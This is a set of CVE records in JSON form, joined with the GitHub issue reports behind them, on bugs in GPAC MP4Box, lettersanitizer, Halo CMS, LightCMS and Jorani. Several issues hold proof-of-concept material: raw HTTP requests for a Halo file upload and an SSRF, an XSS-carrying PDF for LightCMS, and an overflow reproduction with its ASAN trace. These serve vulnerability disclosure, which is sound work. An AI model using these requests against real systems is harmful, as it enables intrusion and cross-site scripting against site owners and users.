[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1908
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...) Step to reproduce: ``` 1.get latest commit code (GPAC version 1.1.0-DEV-rev1216-gb39aa09c0-master) 2.compile with --enable-sanitizer 3.make 5 dirs which every of them has a large name(length=255), this makes the file's abs-path lengh larger than 1024, we called it large.nhml 4.run MP4Box -add {path to large.nhml} -new new.mp4 ``` Env: Ubunut 20.04 , clang 12.0.1 My cmd line an ASAN report MP4Box -add ~/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/large.nhml -new new.mp4 ``` ==2343764==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00000a7a1 at pc 0x7fb8ca3e675d bp 0x7ffd40a5e9d0 sp 0x7ffd40a5e9c8 WRITE of size 1 at 0x61a00000a7a1 thread T0 #0 0x7fb8ca3e675c in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13 #1 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2 #2 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2 #3 0x7fb8ca3cc58a in gf_filter_new /home/lly/pro/gpac_public/src/filter_core/filter.c:382:7 #4 0x7fb8ca3c3d27 in gf_fs_load_source_dest_internal /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2845:12 #5 0x7fb8ca3c47b0 in gf_fs_load_source /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2885:9 #6 0x7fb8c9f97e29 in gf_media_import /home/lly/pro/gpac_public/src/media_tools/media_import.c:1469:11 #7 0x50522f in import_file /home/lly/pro/gpac_public/applications/mp4box/fileimport.c:1289:7 #8 0x4e1a09 in do_add_cat /home/lly/pro/gpac_public/applications/mp4box/main.c:4257:10 #9 0x4e79ca in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5746:13 #10 0x4ea7ca in main /home/lly/pro/gpac_public/applications/mp4box/main.c:6456:1 #11 0x7fb8c92ba0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x429a8d in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429a8d) 0x61a00000a7a1 is located 0 bytes to the right of 1313-byte region [0x61a00000a280,0x61a00000a7a1) allocated by thread T0 here: #0 0x4a4c69 in realloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a4c69) #1 0x7fb8ca3e529d in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1451:12 #2 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2 #3 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13 in filter_parse_dyn_args Shadow bytes around the buggy address: 0x0c347fff94a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c347fff94f0: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ```
heap-buffer-overflow in MP4Box at filter_core/filter.c:1454
https://api.github.com/repos/gpac/gpac/issues/1908/comments
1
2021-09-07T10:07:06Z
2021-09-07T12:49:31Z
https://github.com/gpac/gpac/issues/1908
989,818,036
1,908
3,791
CVE-2022-31103
2022-06-27T23:15:08.170
lettersanitizer is a DOM-based HTML email sanitizer for in-browser email rendering. All versions of lettersanitizer below 1.0.2 are affected by a denial of service issue when processing a CSS at-rule `@keyframes`. This package is depended on by [react-letter](https://github.com/mat-sz/react-letter), therefore everyone using react-letter is also at risk. The problem has been patched in version 1.0.2.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mat-sz/lettersanitizer/commit/96d3dfe2ef0465d47324ed4d13e91ba0816a173f" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mat-sz/lettersanitizer/security/advisories/GHSA-7r3r-gq8p-v9jj" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mat-sz/react-letter/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mat-sz/lettersanitizer/commit/96d3dfe2ef0465d47324ed4d13e91ba0816a173f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mat-sz/lettersanitizer/security/advisories/GHSA-7r3r-gq8p-v9jj" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mat-sz/react-letter/issues/17" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lettersanitizer_project:lettersanitizer:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "7996CE4F-0FF7-4D5F-A65D-99A97283CE50", "versionEndExcluding": "1.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "754" ]
754
https://github.com/mat-sz/react-letter/issues/17
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mat-sz", "react-letter" ]
In production I have issue with this html. If use dangerouslySetInnerHTML, there is no error, but if use react-letter CPU will hold on 100% and the browser will be unresponded Please check [error.zip](https://github.com/mat-sz/react-letter/files/8954131/error.zip) .
100% cpu cost and lagging
https://api.github.com/repos/mat-sz/react-letter/issues/17/comments
14
2022-06-22T03:19:11Z
2025-03-10T19:06:48Z
https://github.com/mat-sz/react-letter/issues/17
1,279,434,802
17
3,792
CVE-2022-32994
2022-06-27T23:15:08.233
Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zongdeiqianxing/cve-reports/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zongdeiqianxing/cve-reports/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "97A6AD19-974E-4BB4-8B49-E88E9B3179B6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/zongdeiqianxing/cve-reports/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zongdeiqianxing", "cve-reports" ]
https://github.com/halo-dev/halo/ Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp、html etc. ### Proof of Concept ``` POST /api/admin/attachments/upload HTTP/1.1 Host: 127.0.0.1:8090 Content-Length: 219 Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX Origin: http://127.0.0.1:8090 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8090/admin/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0 Connection: close ------WebKitFormBoundaryFxTUuVBMVJqfHQHX Content-Disposition: form-data; name="file"; filename="2.jsp" Content-Type: application/octet-stream 1<script>alert(1)</script> ------WebKitFormBoundaryFxTUuVBMVJqfHQHX-- ``` ![image](https://user-images.githubusercontent.com/34082644/172108510-e9dd7d4f-389c-4c3f-b404-34e3c71d8fcd.png) ![image](https://user-images.githubusercontent.com/34082644/172107687-917879d7-3b0b-4e4c-8d22-1a1b05bbd23c.png) [permalink: AttachmentServiceImpl.java L110](https://github.com/halo-dev/halo/blob/master/src/main/java/run/halo/app/service/impl/AttachmentServiceImpl.java#L110) Security is not checked in the relevant code ![image](https://user-images.githubusercontent.com/34082644/172108706-72ddd980-396d-47b5-aa2a-5ebd81c0540e.png)
Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload
https://api.github.com/repos/zongdeiqianxing/cve-reports/issues/1/comments
0
2022-06-06T06:43:34Z
2022-06-06T07:21:21Z
https://github.com/zongdeiqianxing/cve-reports/issues/1
1,261,422,307
1
3,793
CVE-2022-32995
2022-06-27T23:15:08.273
Halo CMS v1.5.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the template remote download function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zongdeiqianxing/cve-reports/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zongdeiqianxing/cve-reports/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "97A6AD19-974E-4BB4-8B49-E88E9B3179B6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/zongdeiqianxing/cve-reports/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zongdeiqianxing", "cve-reports" ]
https://github.com/halo-dev/halo/ There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3. The attacker needs to enter a link that ends with a zip , such as http://127.0.0.1:40001/1.zip ### Proof of Concept ``` POST /api/admin/themes/fetching?uri=http://127.0.0.1:40000/1.zip HTTP/1.1 Host: 127.0.0.1:8090 Content-Length: 2 Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/json Origin: http://127.0.0.1:8090 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8090/admin/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=node08slatpind75xksvtriiymt214.node0 Connection: close { ``` ![image](https://user-images.githubusercontent.com/34082644/172118182-06e1a237-82b8-402e-ba8c-23437e648f5d.png) ![image](https://user-images.githubusercontent.com/34082644/172117731-a7d22fb1-4775-47b9-a053-c82804acc27e.png) [permalink: ZipThemeFetcher.java#L43](https://github.com/halo-dev/halo/blob/352d9d4e2002b3bf8ffa5dfd956c228341519a45/src/main/java/run/halo/app/theme/ZipThemeFetcher.java#L43) The destination address is not limited in the code, so it can cause ssrf vulnerability ![image](https://user-images.githubusercontent.com/34082644/172117947-a40e0bf7-2cca-4b50-b7f6-19d908da6996.png)
There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3 in halo-dev/halo
https://api.github.com/repos/zongdeiqianxing/cve-reports/issues/2/comments
0
2022-06-06T07:47:20Z
2022-06-06T07:47:20Z
https://github.com/zongdeiqianxing/cve-reports/issues/2
1,261,479,417
2
3,794
CVE-2022-33009
2022-06-27T23:15:08.313
A stored cross-site scripting (XSS) vulnerability in LightCMS v1.3.11 allows attackers to execute arbitrary web scripts or HTML via uploading a crafted PDF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://lightcms.com" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/eddy8/LightCMS" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eddy8/LightCMS/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://lightcms.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/eddy8/LightCMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eddy8/LightCMS/issues/30" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lightcms_project:lightcms:1.3.11:*:*:*:*:*:*:*", "matchCriteriaId": "839D2756-08AD-46B0-9B7B-694C35D3B6CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/eddy8/LightCMS/issues/30
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eddy8", "LightCMS" ]
A stored cross-site scripting (XSS) vulnerability exists in LightCMS that allows an user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack. 1. login as admin in the article page ![图片](https://user-images.githubusercontent.com/30437097/172198823-f1ca7332-84de-4187-bc88-989f88816327.png) 2. create a new article ![图片](https://user-images.githubusercontent.com/30437097/172199007-99e61394-bdf8-4515-87c7-ba60d9379b80.png) 3. upload the malicious pdf. the content of xss.pdf : ``` %PDF-1.4 %1111 1 0 obj << /CreationDate (D:20210619104632+08'00') /Creator (xss) /Producer (PDF-XChange Core API SDK \(7.0.324.2\)) >> endobj 2 0 obj << /Metadata 3 0 R /Pages 4 0 R /Type /Catalog >> endobj 3 0 obj << /Length 2983 /Subtype /XML /Type /Metadata >> stream <?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:pdf="http://ns.adobe.com/pdf/1.3/"> <dc:format>application/pdf</dc:format> <xmpMM:DocumentID>uuid:9c93bc08-8e4e-46cb-b28f-824c693821a4</xmpMM:DocumentID> <xmpMM:InstanceID>uuid:2cd63bea-24ca-4ef8-a12c-015da3b28c96</xmpMM:InstanceID> <xmp:CreateDate>2021-06-19T10:46:32+08:00</xmp:CreateDate> <xmp:CreatorTool>迅捷PDF编辑器 7.0.324.2</xmp:CreatorTool> <xmp:ModifyDate>2021-06-19T10:52:02+08:00</xmp:ModifyDate> <pdf:Producer>PDF-XChange Core API SDK (7.0.324.2)</pdf:Producer> </rdf:Description> </rdf:RDF> </x:xmpmeta> ``` 4. back to content then wo edit this upload: ![图片](https://user-images.githubusercontent.com/30437097/172202907-a904a853-3aab-4910-9fc5-f2164122f120.png) 5. when user click the link it will trigger a XSS attack ![图片](https://user-images.githubusercontent.com/30437097/172203003-c12be92d-c17b-4aed-8e46-a23afc005434.png) ![图片](https://user-images.githubusercontent.com/30437097/172203132-87e0056b-6592-48a1-9e85-64f8425aa73a.png)
A stored cross-site scripting (XSS) vulnerability exists in LightCMS "contents" field
https://api.github.com/repos/eddy8/LightCMS/issues/30/comments
2
2022-06-06T16:26:44Z
2022-06-09T03:57:15Z
https://github.com/eddy8/LightCMS/issues/30
1,262,073,812
30
3,795
CVE-2022-34132
2022-06-28T00:15:08.313
Benjamin BALET Jorani v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at application/controllers/Leaves.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/bbalet/jorani/commit/c5c42e29e6a9e59a3c82450bef48b67b8dd48333" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bbalet/jorani/issues/369" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/bbalet/jorani/commit/c5c42e29e6a9e59a3c82450bef48b67b8dd48333" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bbalet/jorani/issues/369" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CE8B2D2D-7CCC-4688-9C1C-5C2512F140E6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/bbalet/jorani/issues/369
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bbalet", "jorani" ]
Hello, Several vulnerabilites were found when peeking into Jorani webapp. An email containing details about those issues was sended. Best regards,
Several vulnerabilities
https://api.github.com/repos/bbalet/jorani/issues/369/comments
2
2022-06-05T19:17:08Z
2022-06-06T19:24:39Z
https://github.com/bbalet/jorani/issues/369
1,261,137,598
369
3,796
CVE-2021-40606
2022-06-28T13:15:09.740
The gf_bs_write_data function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1885" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1885" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gpac/gpac/issues/1885
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
